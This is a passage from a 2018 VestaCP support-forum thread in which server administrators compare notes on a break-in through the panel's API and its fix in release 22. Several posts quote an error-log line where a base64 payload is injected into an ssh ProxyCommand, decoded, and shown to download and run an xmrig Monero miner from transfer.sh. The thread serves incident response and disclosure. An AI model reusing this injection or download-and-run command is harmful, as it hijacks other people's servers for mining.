Page 4 of 5
Re: have been HACKED ! by xaxaxa.eu
Posted: Tue Jun 26, 2018 1:39 pm
by sauvegardezvous99
ScIT wrote: Tue Jun 26, 2018 3:58 am
Can you send a more informations about creation time of the files? Vesta Dev team has patched this issue with release 22, for further investigation we need to be sure that the infection was after upgrade to 22.
to answer your question, I was indeed on 20 version.
Code: Select all
[xxx@two /]# cd /usr/local/vesta/bin
[xxx@two bin]# ./v-list-sys-vesta-updates
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 20 x86_64 yes 2018-04-09
vesta-php 0.9.8 17 x86_64 yes 2016-11-26
vesta-nginx 0.9.8 17 x86_64 yes 2016-11-26
Re: have been HACKED ! by xaxaxa.eu
Posted: Tue Jun 26, 2018 1:43 pm
by sauvegardezvous99
you're up to date, good so far. now you need to clean your server - my point of view: Do not trust a infected server anymore. Better install a new one and migrate the users there.
as you said, I've shutdown the hacked server and move manually all users to another one.
no chance to take.
thank you for all your great advices.
Re: have been HACKED ! by xaxaxa.eu
Posted: Tue Jun 26, 2018 10:04 pm
by deanhills
ScIT wrote: Tue Jun 26, 2018 3:58 am
Can you send a more informations about creation time of the files? Vesta Dev team has patched this issue with release 22, for further investigation we need to be sure that the infection was after upgrade to 22.
I'm going to wait until the outcome of your research and am looking forward to the results before I do anything. My panel is on automatic upgrades - I'm sure most of the user panels are that way.
Only thing that worried me tonight was the dead.file in my file directory and there was an IP from Korea trying to log in with SSH - I've since banned his IP with my Fail2Ban - hopefully there won't be more to follow.
Once I restarted VestaCP tonight everything was fine and when I did research at UNIX about the dead.file it didn't look as though the issue belonged to VestaCP. I'm not sure about that though.
Only bad part was when I mentioned this to my VPS Host they were worried and thought immediately I was hacked because of this thread at VestaCP. I wasn't hacked.
We'll be grateful if you could respond positively from the Admin of VestaCP so our VPS Hosts can have peace of mind about our VestaCP installations. Thanks.
Re: have been HACKED ! by xaxaxa.eu
Posted: Thu Jun 28, 2018 7:02 pm
by ram108
Spheerys wrote: Tue Jun 26, 2018 7:21 am
Look on this file or similar : /etc/cron/d/php5
It's calling another file : /usr/lib/php5/sessionclean
If you are sure what you are doing, delete them both.
sessionclean is a part of php package and should not be removed.
Re: have been HACKED ! by xaxaxa.eu
Posted: Thu Jun 28, 2018 8:58 pm
by Spheerys
you are are right ! I will edit my post. thanks !
Re: have been HACKED ! by xaxaxa.eu
Posted: Sat Jun 30, 2018 11:45 am
by tombabomba
I got hacked as well. 3 vesta server, only 2 of them got hacked.
initially, I didn't know whats going on, so I removed execution permission from /tmp, and partially stopped it.
later found his forum and applied the updates.
Thanks Vesta team for your help and quick release of patch.
Re: have been HACKED ! by xaxaxa.eu
Posted: Mon Jul 02, 2018 10:26 am
by cybersa
My Website was Hacked on Jun 22 around 11:10 PM UTC. My Server get upgraded to latest version automatically.But i think server was infected before that.
I have removed the miner file under /tmp/xmrig. Then i have analyzed the log of server to find the root cause and found following things:
1. No new user(sysroot) has been created as mentioned in the first post's script.
2. No New Cron Jobs has been added.
3. xmrig was ran with this cmd:
Code: Select all
./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=1 --donate-level=1 --background
4. Found this log in /var/log/vesta/error.log
Code: Select all
2018-06-22 23:13:28 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo Y2QgL3RtcDtwa2lsbCB4bXItc3Rhaztwa2lsbCB4bXJpZztybSAtZiB4bXJpZyB4bXItc3RhayBjcHUudHh0IHBvb2xzLnR4dCBjb25maWcudHh0O3dnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8geG1yaWcgaHR0cHM6Ly90cmFuc2Zlci5zaC9leXo0ei94bXJpZyYmY2htb2QgK3ggeG1yaWcmJi4veG1yaWcgLS1hbGdvPWNyeXB0b25pZ2h0IC0tdXJsPXBvb2wubWluZXhtci5jb206ODAgLS11c2VyPTQyeTFRRkJEU1ZtWFpidlpaOTVDTnBQb01kZExTNGRSUGRtaDlXZ0NSM3ZFNUQxYjJYcUdTVjVLb0JIdVBGU3VBalM3WXI3dHA0OGY5QU1WTFh1Z0R1VU1GbXA2dWdkIC0tdGhyZWFkPSQoZ3JlcCBwcm9jZXNzb3IgL3Byb2MvY3B1aW5mb3x3YyAtbCkgLS1kb25hdGUtbGV2ZWw9MSAtLWJhY2tncm91bmQgPC9kZXYvbnVsbCAyPiYxID4vZGV2L251bGwK|base64 -d|sh" x' '******' [Error 15]
Code: Select all
cd /tmp;pkill xmr-stak;pkill xmrig;rm -f xmrig xmr-stak cpu.txt pools.txt config.txt;wget --no-check-certificate -qO xmrig https://transfer.sh/eyz4z/xmrig&&chmod +x xmrig&&./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=$(grep processor /proc/cpuinfo|wc -l) --donate-level=1 --background </dev/null 2>&1 >/dev/null
My OS: Ubuntu 16
FYI
@ScIT
Re: have been HACKED ! by xaxaxa.eu
Posted: Wed Jul 18, 2018 8:29 pm
by semasping
+1 for the last post.
I have the same code in /var/log/vesta/error.log
Code: Select all
2018-06-23 04:01:01 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo Y2QgL3RtcDtwa2lsbCB4bXItc3Rhaztwa2lsbCB4bXJpZztybSAtZiB4bXJpZyB4bXItc3RhayBjcHUudHh0IHBvb2xzLnR4dCBjb25maWcudHh0O3dnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8geG1yaWcgaHR0cHM6Ly90cmFuc2Zlci5zaC9leXo0ei94bXJpZyYmY2htb2QgK3ggeG1yaWcmJi4veG1yaWcgLS1hbGdvPWNyeXB0b25pZ2h0IC0tdXJsPXBvb2wubWluZXhtci5jb206ODAgLS11c2VyPTQyeTFRRkJEU1ZtWFpidlpaOTVDTnBQb01kZExTNGRSUGRtaDlXZ0NSM3ZFNUQxYjJYcUdTVjVLb0JIdVBGU3VBalM3WXI3dHA0OGY5QU1WTFh1Z0R1VU1GbXA2dWdkIC0tdGhyZWFkPSQoZ3JlcCBwcm9jZXNzb3IgL3Byb2MvY3B1aW5mb3x3YyAtbCkgLS1kb25hdGUtbGV2ZWw9MSAtLWJhY2tncm91bmQgPC9kZXYvbnVsbCAyPiYxID4vZGV2L251bGwK|base64 -d|sh" x' '******' [Error 15]
Code: Select all
./v-list-sys-vesta-updates
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 22 amd64 yes 2018-06-25
vesta-php 0.9.8 22 amd64 yes 2018-06-29
vesta-nginx 0.9.8 22 amd64 yes 2018-06-29
vesta-ioncube 0.9.8 21 amd64 yes 2018-06-29
vesta-softaculous 0.9.8 21 amd64 yes 2018-06-29
Re: have been HACKED ! by xaxaxa.eu
Posted: Thu Jul 19, 2018 6:52 am
by ScIT
semasping wrote: Wed Jul 18, 2018 8:29 pm
+1 for the last post.
I have the same code in /var/log/vesta/error.log
Code: Select all
2018-06-23 04:01:01 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo Y2QgL3RtcDtwa2lsbCB4bXItc3Rhaztwa2lsbCB4bXJpZztybSAtZiB4bXJpZyB4bXItc3RhayBjcHUudHh0IHBvb2xzLnR4dCBjb25maWcudHh0O3dnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8geG1yaWcgaHR0cHM6Ly90cmFuc2Zlci5zaC9leXo0ei94bXJpZyYmY2htb2QgK3ggeG1yaWcmJi4veG1yaWcgLS1hbGdvPWNyeXB0b25pZ2h0IC0tdXJsPXBvb2wubWluZXhtci5jb206ODAgLS11c2VyPTQyeTFRRkJEU1ZtWFpidlpaOTVDTnBQb01kZExTNGRSUGRtaDlXZ0NSM3ZFNUQxYjJYcUdTVjVLb0JIdVBGU3VBalM3WXI3dHA0OGY5QU1WTFh1Z0R1VU1GbXA2dWdkIC0tdGhyZWFkPSQoZ3JlcCBwcm9jZXNzb3IgL3Byb2MvY3B1aW5mb3x3YyAtbCkgLS1kb25hdGUtbGV2ZWw9MSAtLWJhY2tncm91bmQgPC9kZXYvbnVsbCAyPiYxID4vZGV2L251bGwK|base64 -d|sh" x' '******' [Error 15]
Code: Select all
./v-list-sys-vesta-updates
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 22 amd64 yes 2018-06-25
vesta-php 0.9.8 22 amd64 yes 2018-06-29
vesta-nginx 0.9.8 22 amd64 yes 2018-06-29
vesta-ioncube 0.9.8 21 amd64 yes 2018-06-29
vesta-softaculous 0.9.8 21 amd64 yes 2018-06-29
Still the same question: Was the infection before or after the update to release 22?
There was a security issue in the api, so it was possible to run api commands like v-add-backup-host. The issue is resolved with R22. If your system is infected, the savest way is to reinstall the server and migrate user data.
Re: have been HACKED ! by xaxaxa.eu
Posted: Fri Jul 20, 2018 10:40 am
by semasping
ScIT wrote: Thu Jul 19, 2018 6:52 am
semasping wrote: Wed Jul 18, 2018 8:29 pm
+1 for the last post.
I have the same code in /var/log/vesta/error.log
Code: Select all
2018-06-23 04:01:01 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo Y2QgL3RtcDtwa2lsbCB4bXItc3Rhaztwa2lsbCB4bXJpZztybSAtZiB4bXJpZyB4bXItc3RhayBjcHUudHh0IHBvb2xzLnR4dCBjb25maWcudHh0O3dnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8geG1yaWcgaHR0cHM6Ly90cmFuc2Zlci5zaC9leXo0ei94bXJpZyYmY2htb2QgK3ggeG1yaWcmJi4veG1yaWcgLS1hbGdvPWNyeXB0b25pZ2h0IC0tdXJsPXBvb2wubWluZXhtci5jb206ODAgLS11c2VyPTQyeTFRRkJEU1ZtWFpidlpaOTVDTnBQb01kZExTNGRSUGRtaDlXZ0NSM3ZFNUQxYjJYcUdTVjVLb0JIdVBGU3VBalM3WXI3dHA0OGY5QU1WTFh1Z0R1VU1GbXA2dWdkIC0tdGhyZWFkPSQoZ3JlcCBwcm9jZXNzb3IgL3Byb2MvY3B1aW5mb3x3YyAtbCkgLS1kb25hdGUtbGV2ZWw9MSAtLWJhY2tncm91bmQgPC9kZXYvbnVsbCAyPiYxID4vZGV2L251bGwK|base64 -d|sh" x' '******' [Error 15]
Code: Select all
./v-list-sys-vesta-updates
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 22 amd64 yes 2018-06-25
vesta-php 0.9.8 22 amd64 yes 2018-06-29
vesta-nginx 0.9.8 22 amd64 yes 2018-06-29
vesta-ioncube 0.9.8 21 amd64 yes 2018-06-29
vesta-softaculous 0.9.8 21 amd64 yes 2018-06-29
Still the same question: Was the infection before or after the update to release 22?
There was a security issue in the api, so it was possible to run api commands like v-add-backup-host. The issue is resolved with R22. If your system is infected, the savest way is to reinstall the server and migrate user data.
The system was infected before the update.